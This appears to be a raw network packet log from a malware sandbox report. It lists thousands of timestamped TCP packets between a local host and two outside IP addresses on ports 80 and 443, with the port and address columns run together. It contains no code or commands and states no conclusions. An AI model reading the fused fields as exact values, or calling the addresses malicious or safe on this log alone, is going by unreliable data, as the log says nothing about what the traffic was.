                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.212506056 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.212522030 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.212532997 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.212538004 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.212548971 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.212564945 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.212582111 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.326453924 CET49163443192.168.2.22104.21.74.191
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.326491117 CET44349163104.21.74.191192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.326550961 CET49163443192.168.2.22104.21.74.191
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.339709997 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.339745998 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.340755939 CET49163443192.168.2.22104.21.74.191
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.340768099 CET44349163104.21.74.191192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.946249962 CET44349163104.21.74.191192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.946316957 CET49163443192.168.2.22104.21.74.191
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.962358952 CET49163443192.168.2.22104.21.74.191
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.962374926 CET44349163104.21.74.191192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.962606907 CET44349163104.21.74.191192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.962656975 CET49163443192.168.2.22104.21.74.191
                                                                                                                                                                                                                  Oct 31, 2024 05:13:57.220963955 CET49163443192.168.2.22104.21.74.191
                                                                                                                                                                                                                  Oct 31, 2024 05:13:57.267338037 CET44349163104.21.74.191192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:57.480375051 CET44349163104.21.74.191192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:57.480436087 CET49163443192.168.2.22104.21.74.191
                                                                                                                                                                                                                  Oct 31, 2024 05:13:57.480438948 CET44349163104.21.74.191192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:57.481137037 CET49163443192.168.2.22104.21.74.191
                                                                                                                                                                                                                  Oct 31, 2024 05:13:57.549694061 CET49163443192.168.2.22104.21.74.191
                                                                                                                                                                                                                  Oct 31, 2024 05:13:57.549727917 CET44349163104.21.74.191192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.274079084 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.279247046 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.279308081 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.279438972 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.284205914 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.940956116 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.940973043 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.940995932 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.941025019 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.941035986 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.941046953 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.941060066 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.941099882 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.941099882 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.941099882 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.941099882 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.941159964 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.941170931 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.941180944 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.941229105 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.946146011 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.946197033 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.946208954 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.946212053 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.946270943 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.947138071 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.057869911 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.057894945 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.057904959 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.057985067 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.057997942 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.058053970 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.058197021 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.058224916 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.058244944 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.058269024 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.058279991 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.058315992 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.058629990 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.058676958 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.058689117 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.058701992 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.058723927 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.058727026 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.058737040 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.058758974 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.059252977 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.059297085 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.059304953 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.059323072 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.059343100 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.059365988 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.059391022 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.059405088 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.059429884 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.059446096 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.060139894 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.060187101 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.060185909 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.060199022 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.060230970 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.060230970 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.060259104 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.060295105 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.060301065 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.060340881 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.061023951 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.061069965 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.062920094 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.062937021 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.062963963 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.062980890 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175282001 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175345898 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175585032 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175602913 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175614119 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175625086 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175636053 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175637007 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175647974 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175647974 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175659895 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175662041 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175669909 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175681114 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175684929 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175689936 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175693035 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175704956 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175714016 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175726891 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175749063 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175754070 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175765991 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175776005 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175787926 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175789118 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175800085 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175806999 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175812960 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175816059 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175843954 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175853014 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.175896883 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176194906 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176206112 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176215887 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176240921 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176256895 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176285982 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176297903 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176309109 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176321983 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176323891 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176331997 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176363945 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176363945 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176471949 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176482916 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176493883 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176515102 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176531076 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176934958 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176948071 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176959038 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176984072 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.176999092 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177057981 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177071095 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177081108 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177094936 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177100897 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177117109 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177141905 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177231073 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177242994 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177253008 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177264929 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177277088 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177292109 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177299976 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177840948 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177853107 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177864075 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177892923 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177892923 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177968025 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177978992 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.177989960 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.178002119 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.178010941 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.178026915 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.178034067 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.178109884 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.178122997 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.178153038 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.178169966 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.180279970 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.180289984 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.180329084 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292157888 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292181969 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292193890 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292221069 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292265892 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292332888 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292345047 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292355061 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292366982 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292372942 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292383909 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292386055 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292399883 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292422056 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292577982 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292588949 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292598963 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292609930 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292619944 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292622089 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292632103 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292633057 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292644978 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292645931 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292656898 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292661905 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292669058 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292681932 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292700052 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292799950 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292840004 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292866945 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292877913 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292906046 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292953014 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292963982 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292974949 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.292987108 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293006897 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293006897 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293025970 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293086052 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293097019 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293123007 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293147087 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293159008 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293169975 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293179989 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293195009 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293214083 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293214083 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293378115 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293390036 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293400049 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293411016 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293421030 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293427944 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293448925 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293448925 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293529987 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293540001 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293555975 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293567896 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293576956 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293579102 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293589115 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293591976 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293605089 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293627024 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293768883 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293780088 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293791056 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293801069 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293812990 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293817997 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293823957 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293826103 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293859959 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.293859959 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.294051886 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.294064045 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.294074059 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.294085026 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.294095039 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.294101000 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.294106007 CET8049164107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.294110060 CET4916480192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:59.294118881 CET8049164107.174.146.46192.168.2.22
